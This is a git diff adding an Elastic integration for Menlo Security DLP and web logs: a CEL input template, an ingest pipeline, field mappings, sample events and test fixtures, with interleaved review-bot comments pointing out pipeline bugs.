\ No newline at end of file
diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json
new file mode 100644
index 00000000000..ce6dc0d3007
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json
@@ -0,0 +1,78 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "block", + "category": [ + "intrusion_detection", + "network" + ], + "created": "2020-03-09T17:16:22.227Z", + "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "kind": "alert", + "original": "{\"event\":{\"dst_url\":\"http://tinyupload.com/\",\"user_input\":\"false\",\"protocol\":\"http\",\"file_type\":\"CSV\",\"domain\":\"tinyupload.com\",\"alerted\":\"false\",\"ccl_ids\":\"CreditordebitcardnumbersGlobal\",\"severity\":\"5\",\"event_time\":\"2020-03-09T17:16:22.227000\",\"event_id\":\"a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce\",\"filename\":\"credit_cards.csv\",\"version\":\"2.0\",\"sha256\":\"fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a\",\"status\":\"dirty\",\"product\":\"MSIP\",\"ccl_match_counts\":\"1\",\"vendor\":\"Menlo Security\",\"ccl_scores\":\"1\",\"rule_name\":\"Credit card block rule\",\"request_type\":\"GET\",\"src_url\":\"http://tinyupload.com/\",\"categories\":\"Download Sites\",\"stream_name\":\"/safefile-input/working_file\",\"name\":\"file_upload\",\"userid\":\"admin@menlosecurity.com\",\"action\":\"block\",\"rule_id\":\"1f3ef32c-ec62-42fb-8cad-e1fee3375099\"}}", + "outcome": "success", + "severity": 5 + }, + "file": { + "hash": { + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + }, + "name": "credit_cards.csv" + }, + "http": { + "request": { + "method": "GET" + } + }, + "menlo": { + "dlp": { + "alerted": "false", + "category": "Download Sites", + "ccl": { + "id": "CreditordebitcardnumbersGlobal", + "match_counts": 1, + "score": 1 + }, + "status": "dirty", + "stream_name": "/safefile-input/working_file", + "user_input": "false" + } + }, + "observer": { + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "hash": [ + "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + ], + "user": [ + 
"admin@menlosecurity.com" + ] + }, + "rule": { + "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099", + "name": "Credit card block rule" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "tinyupload.com", + "original": "http://tinyupload.com/", + "path": "/", + "registered_domain": "tinyupload.com", + "scheme": "http", + "top_level_domain": "com" + }, + "user": { + "name": "admin@menlosecurity.com" + } + } + ] +} \ No newline at end of file diff --git a/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml b/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..cf8c52ab8b8 --- /dev/null +++ b/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml @@ -0,0 +1,11 @@ +input: cel +service: menlo +vars: + url: http://{{Hostname}}:{{Port}}/api/rep/v1/fetch/client_select + token: xxxx +data_stream: + vars: + batch_size: 2 + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs b/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs new file mode 100644 index 00000000000..676c4882736 --- /dev/null +++ b/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs 
@@ -0,0 +1,80 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +redact: + fields: + - token +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + batch_size: {{batch_size}} + initial_interval: {{initial_interval}} + token: {{token}} +program: | + post_request( + state.url + "?format=json" + "&limit=" + string(state.batch_size) + "&end=" + string(int(now())) + "&start=" + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(int(state.cursor.last_timestamp.parse_time(time_layout.RFC3339))) + : + (string(int(now() - duration(state.initial_interval)))) + ), + "application/json", + {"token": state.token, "log_type": "dlp", "pagingIdentifiers": ( + has(state.cursor) && has(state.cursor.paging) && state.cursor.paging != null ? + state.cursor.paging + : + {} + ) + }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body[0].result.events.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "batch_size": state.batch_size, + "token": state.token, + "cursor": { + "last_timestamp": ( + has(body[0].timestamp) && body[0].timestamp.size() > 0 + ? + body[0].timestamp.parse_time(time_layout.RFC3339) + : + null + ), + "paging": ( + has(body[0].result.pagingIdentifiers) && body[0].result.pagingIdentifiers.size() > 0 ? 
+ body[0].result.pagingIdentifiers + : + null + ) + } + }) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml b/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..8329bd0d570 --- /dev/null +++ b/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml 
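Review bot: The CEL program decodes the response and indexes `body[0].result.events` without checking `resp.StatusCode`, so an authentication failure or a 5xx from `client_select` (which will not carry the expected array) fails inside `decode_json` or the indexing with an opaque error instead of a reportable one; the same happens if the API can legitimately return an empty array, since `body[0]` is unguarded. Wrap the decode in the usual guard, `resp.StatusCode == 200 ? bytes(resp.Body).decode_json().as(body, { … }) : {"events": {"error": {"code": string(resp.StatusCode), "message": "POST " + state.url + ": " + string(resp.StatusCode)}}, "want_more": false}`, so failures surface as `error.message` events. The program also never sets `want_more`, so at most one `batch_size` page is fetched per interval; the `pagingIdentifiers.last_iteration` flag in the mock config looks like the API's end-of-pages signal and could drive `want_more`, which is worth confirming against the API documentation.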
@@ -0,0 +1,200 @@ +--- +description: Mapping of Menlo DLP Fields from API into ECS fields. +processors: + - set: + field: ecs.version + value: 8.11.0 + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - set: + field: event.kind + value: alert + - json: + field: event.original + tag: 'json_decoding' + target_field: json + - rename: + field: json.event.event_id + target_field: event.id + ignore_missing: true + - date: + field: "json.event.event_time" + formats: + - "ISO8601" + target_field: "event.created" + timezone: "UTC" + tag: date_event_created_time_epoch + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uri_parts: + field: json.event.dst_url + target_field: "url" + keep_original: true + remove_if_successful: true + if: ctx.json?.event?.dst_url != null + - registered_domain: + field: url.domain + target_field: url + - rename: + field: json.event.rule_id + target_field: rule.id + ignore_missing: true + - rename: + field: json.event.action + target_field: event.action + ignore_missing: true + - set: + field: event.action + value: blocked + if: ctx.json.event.action == 'block' + - set: + field: event.action + value: log + if: ctx.json.event.action == 'log' + - set: + field: event.type + value: denied + if: ctx.event.action == 'blocked' + - rename: + field: json.event.rule_name + target_field: rule.name + ignore_missing: true + - set: + field: event.category + value: intrusion_detection + - append: + field: event.category + value: network + - convert: + field: "json.event.severity" + type: long + target_field: "event.severity" + ignore_missing: true + - set: + field: event.outcome + value: unknown + - set: + field: event.outcome + value: success + if: 
ctx.event.action == 'log' || ctx.event.action == 'block' + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.vendor + target_field: observer.vendor + ignore_missing: true + - rename: + field: json.event.version + target_field: observer.version + ignore_missing: true + - rename: + field: json.event.request_type + target_field: http.request.method + ignore_missing: true + - rename: + field: menlo.protocol + target_field: network.protocol + ignore_missing: true + - append: + field: related.user + value: '{{json.event.userid}}' + allow_duplicates: false + if: ctx.json?.event?.userid != null + - rename: + field: json.event.userid + target_field: user.name + ignore_missing: true + - rename: + field: json.event.filename + target_field: file.name + ignore_missing: true + - rename: + field: json.event.sha256 + target_field: file.hash.sha256 + if: ctx.json?.sha256 != "NA" + ignore_missing: true + - append: + field: related.hash + value: "{{{file.hash.sha256}}}" + allow_duplicates: false + if: ctx.file?.hash.sha256 != null + - rename: + field: json.event.categories + target_field: menlo.dlp.category + ignore_missing: true + - convert: + ignore_failure: true + field: json.event.ccl_match_counts + type: long + target_field: menlo.dlp.ccl.match_counts + ignore_missing: true + - rename: + field: json.event.user_input + target_field: menlo.dlp.user_input + ignore_missing: true + - rename: + field: json.event.alerted + target_field: menlo.dlp.alerted + ignore_missing: true + - rename: + field: json.event.status + target_field: menlo.dlp.status + ignore_missing: true + - convert: + field: json.event.ccl_scores + type: long + target_field: menlo.dlp.ccl.score + ignore_missing: true + - rename: + field: json.event.ccl_ids + target_field: menlo.dlp.ccl.id + - rename: + field: json.event.stream_name + target_field: menlo.dlp.stream_name + - remove: + field: json + tag: remove_json + ignore_missing: true + - 
remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/menlo/data_stream/dlp/fields/agent.yml b/packages/menlo/data_stream/dlp/fields/agent.yml new file mode 100644 index 00000000000..98d2f9f38d5 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/agent.yml 
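Review bot: The two `set` processors that normalise `event.action` to `blocked`/`log` test `ctx.json.event.action`, but the `rename` immediately above has already moved that value to `event.action`, so both conditions are always false, `event.type: denied` never fires and the raw `block` is emitted — the expected output in this PR shows exactly that (`"action": "block"`, no `event.type`). Change them to `if: ctx.event?.action == 'block'` / `if: ctx.event?.action == 'log'` and make the `event.outcome` condition compare against the normalised value (`'blocked'`), or move the rename below the sets. `rename: field: json.event.sha256` is guarded by `if: ctx.json?.sha256 != "NA"`, which never inspects `json.event.sha256`, so a literal `NA` placeholder would be indexed as a hash and appended to `related.hash`; it should read `if: ctx.json?.event?.sha256 != "NA"`. `rename: field: menlo.protocol` names a field nothing creates — the source is `json.event.protocol` — so `network.protocol` is never populated and the value is discarded by `remove: json`. The `ccl_ids` and `stream_name` renames lack `ignore_missing: true`, and the `event.original` removal uses the `ctx.tags == null || !(...)` form that the mattermost hunk in this same PR replaces with `ctx.tags?.contains('preserve_original_event') != true`.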
@@ -0,0 +1,177 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`.' + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. 
It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/menlo/data_stream/dlp/fields/base-fields.yml b/packages/menlo/data_stream/dlp/fields/base-fields.yml new file mode 100644 index 00000000000..04bbdc68018 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/base-fields.yml 
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: menlo
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: menlo.dlp
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/menlo/data_stream/dlp/fields/ecs.yml b/packages/menlo/data_stream/dlp/fields/ecs.yml
new file mode 100644
index 00000000000..bc427b45597
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/fields/ecs.yml
@@ -0,0 +1,54 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.action
+- external: ecs
+ name: event.id
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.outcome
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: file.hash.sha256
+- external: ecs
+ name: file.name
+- external: ecs
+ name: http.request.method
+- external: ecs
+ name: observer.product
+- external: ecs
+ name: observer.vendor
+- external: ecs
+ name: observer.version
+- external: ecs
+ name: related.user
+- external: ecs
+ name: related.hash
+- external: ecs
+ name: rule.id
+- external: ecs
+ name: rule.name
+- external: ecs
+ name: tags
+- external: ecs
+ name: url.domain
+- external: ecs
+ name: url.original
+- external: ecs
+ name: url.path
+- external: ecs
+ name: url.registered_domain
+- external: ecs
+ name: url.scheme
+- external: ecs
+ name: url.top_level_domain
+- external: ecs
+ name: user.name
diff --git a/packages/menlo/data_stream/dlp/fields/fields.yml b/packages/menlo/data_stream/dlp/fields/fields.yml
new file mode 100644
index 00000000000..e56c4dfc448
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/fields/fields.yml
@@ -0,0 +1,30 @@
+- name: menlo
+ type: group
+ fields:
+ - name: dlp
+ type: group
+ fields:
+ - name: category
+ type: keyword
+ description: "Category Rules Category type classification"
+ - name: ccl.match_counts
+ type: long
+ description: "Number of matches of the string that caused the violation"
+ - name: user_input
+ type: boolean
+ description: "Whether or not this event was generated as a result of user form input"
+ - name: alerted
+ type: boolean
+ description: "Whether or not an email alert was sent to a DLP Auditor profile"
+ - name: status
+ type: keyword
+ description: "Result from the DLP engine"
+ - name: ccl.score
+ type: long
+ description: "DLP score from the dictionary that caused the violation"
+ - name: ccl.id
+ type: keyword
+ description: "Name of DLP dictionary that was violated"
+ - name: stream_name
+ type: keyword
+ description: "Internal name used for the file (usually working_file) or text stream (uid)"
diff --git a/packages/menlo/data_stream/dlp/manifest.yml b/packages/menlo/data_stream/dlp/manifest.yml
new file mode 100644
index 00000000000..479b62f4d73
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/manifest.yml
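Review bot: `alerted` and `user_input` are mapped as `type: boolean` here, but the `sample_event.json` added in this same change carries them as the strings `"false"` (`"alerted": "false"`, `"user_input": "false"`), which suggests the dlp ingest pipeline (not in this chunk) renames them without a `convert`. Elasticsearch coerces `"true"`/`"false"` into a boolean mapping, but any other literal the vendor emits — the web feed in this change uses `NA` as a placeholder — would fail the mapping and reject the whole document unless the template sets `ignore_malformed`. Convert the source values with `type: boolean` behind an `if` that skips the placeholder, mirroring how the web pipeline in this diff handles `has_password`, so the sample event shows real booleans.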
@@ -0,0 +1,78 @@
+title: Collect Menlo DLP from Menlo Security API
+type: logs
+streams:
+ - input: cel
+ title: Menlo DLP Logs
+ description: Collect Menlo DLP logs
+ template_path: input.yml.hbs
+ vars:
+ - name: batch_size
+ type: text
+ title: Batch Size
+ description: Batch size for the response of the Menlo Security API.
+ default: 1000
+ required: true
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: "How far back to pull the events from Menlo Security API. NOTE: Supported units for this parameter are h/m/s."
+ multi: false
+ required: true
+ show_user: true
+ default: 24h
+ - name: interval
+ type: text
+ title: Interval
+ description: "Duration between requests to the Menlo Security API. NOTE: Supported units for this parameter are h/m/s."
+ default: 1m
+ multi: false
+ required: true
+ show_user: true
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 30s
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - menlo
+ - forwarded
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: false
+ title: Preserve duplicate custom fields
+ description: Preserve menlo.dlp fields that were copied to Elastic Common Schema (ECS) fields.
+ type: bool
+ multi: false
+ default: false
diff --git a/packages/menlo/data_stream/dlp/sample_event.json b/packages/menlo/data_stream/dlp/sample_event.json
new file mode 100644
index 00000000000..e39fa7e3a8c
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/sample_event.json
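Review bot: The `enable_request_tracer` description links to the httpjson input's request tracer, but this stream is declared `- input: cel`, so the option that is actually set is the CEL input's `resource.tracer.filename`, and its behaviour (trace location, `redact` fields, `maxbackups`) is documented under the CEL input; point the link there so operators read the right semantics. The warning that tracing "compromises security" is worth keeping: the trace records full request bodies, and the companion web-stream template in this change posts the API token in the POST body, relying on a `redact` list to keep it out of the trace file. If the dlp template (not in this chunk) follows the same pattern, its `redact` list needs to cover every credential field, and the description could say so explicitly, e.g. `Tracing writes request bodies to disk; credentials listed under redact are masked, anything else is stored in clear.`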
@@ -0,0 +1,98 @@
+{
+ "@timestamp": "2024-03-28T13:30:21.204Z",
+ "agent": {
+ "ephemeral_id": "1054908a-63b4-46fd-8028-f975d0f878c2",
+ "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f",
+ "name": "docker-fleet-agent",
+ "type": "filebeat",
+ "version": "8.12.2"
+ },
+ "data_stream": {
+ "dataset": "menlo.dlp",
+ "namespace": "ep",
+ "type": "logs"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "elastic_agent": {
+ "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f",
+ "snapshot": false,
+ "version": "8.12.2"
+ },
+ "event": {
+ "action": "block",
+ "agent_id_status": "verified",
+ "category": [
+ "intrusion_detection",
+ "network"
+ ],
+ "created": "2020-03-09T17:17:22.227Z",
+ "dataset": "menlo.dlp",
+ "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce",
+ "ingested": "2024-03-28T13:30:33Z",
+ "kind": "alert",
+ "outcome": "success",
+ "severity": 5
+ },
+ "file": {
+ "hash": {
+ "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a"
+ },
+ "name": "more_credit_cards.csv"
+ },
+ "http": {
+ "request": {
+ "method": "GET"
+ }
+ },
+ "input": {
+ "type": "cel"
+ },
+ "menlo": {
+ "dlp": {
+ "alerted": "false",
+ "category": "Download Sites",
+ "ccl": {
+ "id": "CreditordebitcardnumbersGlobal",
+ "match_counts": 1,
+ "score": 1
+ },
+ "status": "dirty",
+ "stream_name": "/safefile-input/working_file",
+ "user_input": "false"
+ }
+ },
+ "observer": {
+ "product": "MSIP",
+ "vendor": "Menlo Security",
+ "version": "2.0"
+ },
+ "related": {
+ "hash": [
+ "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a"
+ ],
+ "user": [
+ "admin@menlosecurity.com"
+ ]
+ },
+ "rule": {
+ "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099",
+ "name": "Credit card block rule"
+ },
+ "tags": [
+ "menlo",
+ "forwarded"
+ ],
+ "url": {
+ "domain": "tinynewupload.com",
+ "original": "http://tinynewupload.com/",
+ "path": "/",
+ "registered_domain": "tinynewupload.com",
+ "scheme": "http",
+ "top_level_domain": "com"
+ },
+ "user": {
+ "name": "admin@menlosecurity.com"
+ }
+}
\ No newline at end of file
diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml b/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log
new file mode 100644
index 00000000000..52673314d72
--- /dev/null
+++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log
@@ -0,0 +1,3 @@ +{"event":{"top_url":"http://elastic.co/","egress_country":"US","domain":"elastic.co","protocol":"http","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.1","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.102000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.1","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"http://elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","content-type":"text/html; charset=UTF-8","response_code":"308"}} +{"event":{"top_url":"https://elastic.co/","egress_country":"US","domain":"elastic.co","protocol":"https","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.1","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.132000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.1","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo 
Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","referer":"http://elastic.co/","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"https://elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","response_code":"301"}} +{"event":{"top_url":"https://www.elastic.co/","egress_country":"US","domain":"www.elastic.co","protocol":"https","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.2","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.207000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.2","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","referer":"http://elastic.co/","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"https://www.elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","content-type":"text/html; charset=utf-8","response_code":"200"}} 
diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json new file mode 100644 index 00000000000..89633640691 --- /dev/null +++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json 
